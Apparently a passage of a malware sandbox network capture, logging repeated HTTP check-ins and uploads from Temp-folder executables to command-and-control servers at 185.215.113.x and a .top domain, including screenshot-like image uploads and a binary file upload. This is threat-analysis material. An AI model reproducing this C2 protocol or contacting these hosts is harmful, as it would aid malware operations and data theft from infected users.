Sep 3, 2024 17:14:13.230866909 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:14:13.541158915 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.8	49817	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:12.637216091 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----OTIwMDU= Host: 185.215.113.19 Content-Length: 92157 Cache-Control: no-cache
Sep 3, 2024 17:14:12.637265921 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 54 49 77 4d 44 55 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------OTIwMDU=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Sep 3, 2024 17:14:12.637305975 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Sep 3, 2024 17:14:12.637329102 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Sep 3, 2024 17:14:12.637356997 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Sep 3, 2024 17:14:12.637367964 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Sep 3, 2024 17:14:12.637388945 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Sep 3, 2024 17:14:12.637408972 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Sep 3, 2024 17:14:12.637429953 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Sep 3, 2024 17:14:12.637453079 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Sep 3, 2024 17:14:12.637481928 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Sep 3, 2024 17:14:15.400018930 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.8	49818	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:13.378721952 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:14.252815962 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:14.302975893 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 3, 2024 17:14:14.684324026 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.8	49819	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:13.419758081 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:14.553059101 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:14.557847023 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 32 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 42 35 45 33 32 46 37 45 34 34 31 32 41 37 34 36 35 41 38 45 36 34 44 30 41 41 45 44 39 46 33 43 30 41 30 41 41 39 42 43 32 32 44 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278529C05BEA3669A52777FA6135B5E32F7E4412A7465A8E64D0AAED9F3C0A0AA9BC22DD20FDE4F01730503
Sep 3, 2024 17:14:15.121910095 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.8	49820	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:13.995877028 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:14.777955055 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:14.789839983 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:14:15.134799004 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.8	49821	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:14.889879942 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:15.816159010 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:16.052759886 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 3, 2024 17:14:16.347923994 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.8	49823	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:15.271876097 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:16.359752893 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:16.410073042 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 32 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 42 35 45 33 32 46 37 45 34 34 31 32 41 37 34 36 35 41 38 45 36 34 44 30 41 41 45 44 39 46 33 43 30 41 30 41 41 39 42 43 32 32 44 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278529C05BEA3669A52777FA6135B5E32F7E4412A7465A8E64D0AAED9F3C0A0AA9BC22DD20FDE4F01730503
Sep 3, 2024 17:14:16.794819117 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.8	49824	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:15.358489037 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:16.242677927 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:16.342938900 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:14:16.631958008 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.8	49825	195.133.13.230	80	5192	C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:16.053314924 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary27274414 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: thirtv13vt.top
Sep 3, 2024 17:14:16.053349972 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 32 37 32 37 34 34 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 59 69 67 Data Ascii: ------Boundary27274414Content-Disposition: form-data; name="file"; filename="Yigevaga.bin"Content-Type: application/octet-stream6Y&~] &TFG,Ugx!giRM]HO\|MYK>SE<itsDPz\|.z4D
Sep 3, 2024 17:14:16.789758921 CEST	190	IN	HTTP/1.1 200 OK server: nginx/1.24.0 (Ubuntu) date: Tue, 03 Sep 2024 15:14:16 GMT content-type: text/plain; charset=utf-8 content-length: 2 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.8	49826	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:16.167817116 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----OTIwMjg= Host: 185.215.113.19 Content-Length: 92180 Cache-Control: no-cache
Sep 3, 2024 17:14:16.168056965 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 54 49 77 4d 6a 67 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------OTIwMjg=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Sep 3, 2024 17:14:16.168129921 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Sep 3, 2024 17:14:16.168129921 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Sep 3, 2024 17:14:16.168212891 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Sep 3, 2024 17:14:16.168262005 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Sep 3, 2024 17:14:16.168262005 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Sep 3, 2024 17:14:16.168327093 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Sep 3, 2024 17:14:16.168380976 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Sep 3, 2024 17:14:16.168380976 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Sep 3, 2024 17:14:16.168452978 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Sep 3, 2024 17:14:17.811494112 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.8	49827	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:16.745923042 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:17.567502975 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:17.589915991 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 3, 2024 17:14:17.872776985 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.8	49828	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:17.035464048 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:17.762610912 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:17.772450924 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:14:18.040499926 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.8	49829	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:17.159559965 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:18.083240986 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:18.167879105 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 32 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 42 35 45 33 32 46 37 45 34 34 31 32 41 37 34 36 35 41 38 45 36 34 44 30 41 41 45 44 39 46 33 43 30 41 30 41 41 39 42 43 32 32 44 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278529C05BEA3669A52777FA6135B5E32F7E4412A7465A8E64D0AAED9F3C0A0AA9BC22DD20FDE4F01730503
Sep 3, 2024 17:14:18.558525085 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.8	49831	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:19.127901077 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:19.801367044 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
